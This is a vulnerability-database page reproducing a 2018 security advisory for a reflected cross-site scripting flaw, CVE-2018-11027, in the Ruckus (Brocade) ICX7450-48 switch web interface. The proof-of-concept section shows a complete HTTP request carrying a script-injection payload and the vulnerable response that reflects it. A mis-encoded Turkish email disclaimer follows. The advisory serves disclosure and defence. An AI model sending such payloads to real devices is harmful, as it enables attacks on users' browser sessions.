Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormYavuz AtlasPACKETSTORM:147901
HistoryMay 25, 2018 - 12:00 a.m.

Ruckus (Brocade) ICX7450-48 Reflected Cross Site Scripting

2018-05-2500:00:00
Yavuz Atlas
packetstormsecurity.com
36

EPSS

0.001

Percentile

50.9%

JSON
`I. VULNERABILITY  
-------------------------  
Ruckus (Brocade) ICX7450-48 Reflected Cross Site Scripting  
  
  
II. CVE REFERENCE  
-------------------------  
CVE-2018-11027  
  
  
III. VENDOR HOMEPAGE  
-------------------------  
https://www.ruckuswireless.com  
  
  
IV. DESCRIPTION  
-------------------------  
Ruckus (Brocade) ICX7450-48 web application has a reflected cross-site  
scripting vulnerability. A successful exploit could allow the attacker  
to execute arbitrary script code in the context of the affected site  
and allow the attacker to access sensitive browser-based information.  
  
  
V. PROOF OF CONCEPT  
-------------------------  
Request:  
  
GET /<script>alert(1)</script> HTTP/1.1  
Host: 10.10.10.10  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0)  
Gecko/20100101 Firefox/59.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
  
Response:  
  
<html>  
<head>  
<title>Object Not Found</title>  
</head>  
<body>  
<h1>Object Not Found</h1>  
The requested URL '/<script>alert(1)</script>' was not found on the asdf_ICX.<p>  
Return to <a href="">last page</a><p>  
</body>  
</html>  
  
  
VI. CREDIT  
-------------------------  
Yavuz Atlas - @yavuzatlas_  
http://www.biznet.com.tr  
  
--   
Bu mesaj ve  
ekleri, mesajda gAPnderildiAi belirtilen kiAi/kiAilere APzeldir   
ve   
gizlidir. Bu mesaj herhangi bir amaASS iASSin ASSoAaltA+-lamaz, daAA+-tA+-lamaz ve   
  
yayA+-nlanamaz. MesajA+-n gAPnderildiAi kiAi deAilseniz, mesaj iASSeriAini ya   
da   
eklerini kopyalamayA+-nA+-z, yayA+-nlamayA+-nA+-z ya da baAka kiAilere   
  
yAPnlendirmeyiniz ve mesajA+- gAPnderen kiAiyi derhal uyararak bu mesajA+-   
  
siliniz. Airketimiz, mesajA+-n iASSeriAinin ve eklerinin size deAiAikliAe   
  
uArayarak veya geASS ulaAmasA+-ndan; gizliliAinin korunmamasA+-ndan; virA1/4s   
  
iASSermesinden ve bilgisayar sisteminize verebileceAi herhangi bir   
zarardan   
sorumlu deAildir.  
This message and its attachments are   
confidential and   
intended solely for the recipient(s) stated therein.   
This message cannot   
be copied, distributed or published for any purpose.  
If you are not the   
intended recipient, please do not copy, publish or   
forward the information   
existing in the content and attachments of this   
message. In such case   
please notify the sender immediately and delete   
all the copies of the   
message. Our company shall have no liability for   
any changes in or late   
receiving of the message, loss of integrity and   
confidentiality, viruses   
and any damages caused in anyway to your   
computer system based on this   
message.  
`

Related

nvd 1
cvelist 1
prion 1
cve 1
nvd
nvd
CVE-2018-11027
2018-05-29 20:29:02
cvelist
cvelist
CVE-2018-11027
2018-05-29 20:00:00
prion
prion
Cross site scripting
2018-05-29 20:29:00
cve
cve
CVE-2018-11027
2018-05-29 20:29:02

EPSS

0.001

Percentile

50.9%

JSON
Related for PACKETSTORM:147901
nvd1cvelist1prion1cve1